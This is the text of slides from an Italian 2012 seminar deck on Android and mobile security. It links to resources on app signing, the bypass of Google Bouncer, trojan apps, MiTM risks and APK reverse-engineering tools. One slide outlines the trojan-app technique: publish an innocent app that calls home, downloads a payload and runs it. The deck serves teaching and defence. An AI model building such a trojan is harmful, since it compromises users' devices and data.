http://source.android.com/tech/security/index.html#how-users-understand-third-party- applications permessi definiti nel Manifest dell'applicazione che l'utente deve accettare in fase di installazione pacchetti (.apk) firmati digitalmente per OS e Play Store ... “Applications can be signed by a third-party (OEM, operator, alternative market) or self- signed. Android provides code signing using self-signed certificates that developers can generate without external assistance or permission. Applications do not have to be signed by a central authority. Android currently does not perform CA verification for application certificates.” Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 22
23.
Google Bouncer http://www.h-online.com/security/news/item/Google-s-Bouncer-scans-the-Android-Market-
for-Malware-1427814.html Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 23
24.
Google Bouncer (PWNED)
http://jon.oberheide.org/blog/2012/06/21/dissecting-the-android-bouncer/ Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 24
25.
Rogue App http://blogs.mcafee.com/mcafee-labs/android-malware-pairs-man-in-the-middle-
with-remote-controlled-banking-trojan Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 25
26.
Trojan App
http://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/ http://jon.oberheide.org/files/summercon10-androidhax-jonoberheide.pdf ●applicazione “innocente” ●pubblicata sul market ●“call home” ●scarica malicious payload ●lo esegue run-time Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 26
27.
Trojan aftermarket firmware
(non ci sono casi pubblicamente conosciuti, AFAIK) http://labs.neohapsis.com/2011/12/21/the-security-implications-of-custom-android-roms/ Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 27
28.
Traffico di rete
http://phys.org/news/2011-05-android-devices-susceptible-eavesdropping.html ●no HTTPS (ahi ahi ahi) ●MiTM ●Hot Spot ●Rogue APs Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 28
29.
Decompilazione / reversing
Batteries (almost) included, no assembly required http://code.google.com/p/apk-extractor/ “is capable of parsing Android Manifest, XML layouts etc. and converting DEX/ODEX to CLASS, which can be opened by any de-compiler. “ http://code.google.com/p/dex2jar/ Tools to work with android .dex and java .class files (read, convert, modify, deobfuscate, ..) http://code.google.com/p/smali/ An assembler/disassembler for Android's dex format http://code.google.com/p/android-apktool/ It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them [..] http://java.decompiler.free.fr/?q=jdgui Yet another fast Java decompiler Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 29
30.
.apk tools demo
Batteries (almost) included, no assembly required demo Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 30
31.
reversing, injections, ..
(some) assembly required http://mulliner.org/android/feed/binaryinstrumentationandroid_mulliner_summercon12.pdf Binary Instrumentation on Android, Collin Mulliner http://www.slideshare.net/jserv/practice-of-android-reverse-engineering Practice of Android Reverse Engineering, Jim Huang http://code.google.com/p/androguard/ Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) https://redmine.honeynet.org/projects/are Virtual Machine for Android Reverse Engineering http://radare.org radare, the reverse engineering framework Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 31
32.
OWASP Top 10
Mobile Risks (RC1) https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 32
33.
(Domande?) do android malware
writers dream of electric sheep? seminari AIPSI free advertising > Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano http://creativecommons.org/licenses/by-sa/2.0/it/deed.it © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 33
Descargar ahora